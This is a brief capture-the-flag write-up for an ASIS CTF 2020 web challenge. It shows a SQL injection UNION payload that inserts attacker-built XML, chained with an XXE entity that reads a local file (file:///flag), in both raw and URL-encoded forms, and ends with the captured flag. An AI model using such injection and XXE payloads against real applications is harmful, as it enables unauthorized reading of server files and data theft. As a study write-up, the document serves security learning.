This is a challenge from ASISCTF 2020

The Treasury_#1: https://github.com/phulelouch/WRITE_UP/blob/master/SQL_Injection/Treasury_%231

From the first we know that we can add new xml of our own by sql syntax
-1' UNION SELECT CONCAT( '<?xml version="1.0" encoding="UTF-8"?><book><excerpt>x',(REPLACE (SUBSTRING(info, 1,257), "<", "x"%20 )),'</excerpt></book><!--',info,'-->') FROM books WHERE id=2 -- -

Which mean we can do XXE, the payload was simple:

<!DOCTYPE+foo+[ <!ENTITY+xxe+SYSTEM "file:///flag">+]>

and call &xxe; in <excerpt> tag after that will do the work, 
but one thing to remember that we also need to URL-encode the & because it is the seperate between parameters:

%26xxe%3B+%0D%0A

so the end payload look like this:

-1'+UNION+SELECT+CONCAT( '<?xml+version="1.0"+encoding="UTF-8"?><!DOCTYPE+foo+[ <!ENTITY+xxe+SYSTEM "file:///flag">+]><book><excerpt>&xxe; 
</excerpt></book><!--',info,'-->')+FROM+books+WHERE+id=2+--+-

-1%27+UNION+SELECT+CONCAT(+%27%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE+foo+[+%3C!ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fflag%22%3E+]
%3E%3Cbook%3E%3Cexcerpt%3E%26xxe%3B+%0D%0A%3C%2Fexcerpt%3E%3C%2Fbook%3E%3C!--%27%2Cinfo%2C%27--%3E%27)+FROM+books+WHERE+id%3D2+--+-


And magic
ASIS{03482b1821398ccb5214d891aed35dc87d3a77b2} 
